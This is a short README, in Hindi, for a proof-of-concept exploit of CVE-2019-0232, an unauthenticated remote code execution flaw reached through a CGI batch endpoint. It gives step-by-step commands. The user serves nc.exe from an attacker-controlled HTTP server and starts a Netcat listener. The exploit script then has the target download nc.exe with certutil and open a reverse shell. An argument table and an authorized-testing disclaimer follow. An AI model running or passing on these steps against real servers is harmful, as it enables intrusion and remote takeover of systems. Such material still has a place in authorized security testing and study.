
/jaiguptanick/CVE-2019-0232 पर आधारित शोषण
अप्रमाणित RCE के लिए PoC CGI बैच एंडपॉइंट के माध्यम से। certutil का उपयोग करके लक्ष्य पर nc.exe डाउनलोड करता है और एक रिवर्स शेल ट्रिगर करता है।
1. nc.exe सर्व करें (उसी निर्देशिका में जहाँ nc.exe है):
python3 -m http.server 80
2. अपना लिसनर शुरू करें:
nc -lvnp 1234
3. शोषण चलाएँ:
python3 exploit.py \
--url http://:/cgi/.bat \
--server-ip \
--server-port 80 \
--nc-ip \
--nc-port 1234
| आर्गुमेंट | आवश्यक | डिफ़ॉल्ट | विवरण |
|---|
--url | ✅ | — | CGI एंडपॉइंट के साथ पूर्ण लक्ष्य URL |
--server-ip | ✅ | — | HTTP के माध्यम से nc.exe सर्व करने वाला आपका IP |
--server-port | ❌ | 80 | HTTP सर्वर के लिए पोर्ट |
--nc-ip | ✅ | — | आपका Netcat लिसनर IP |
--nc-port | ✅ | — | आपका Netcat लिसनर पोर्ट |
केवल अधिकृत पैनेट्रेशन टेस्टिंग और शैक्षिक उद्देश्यों के लिए।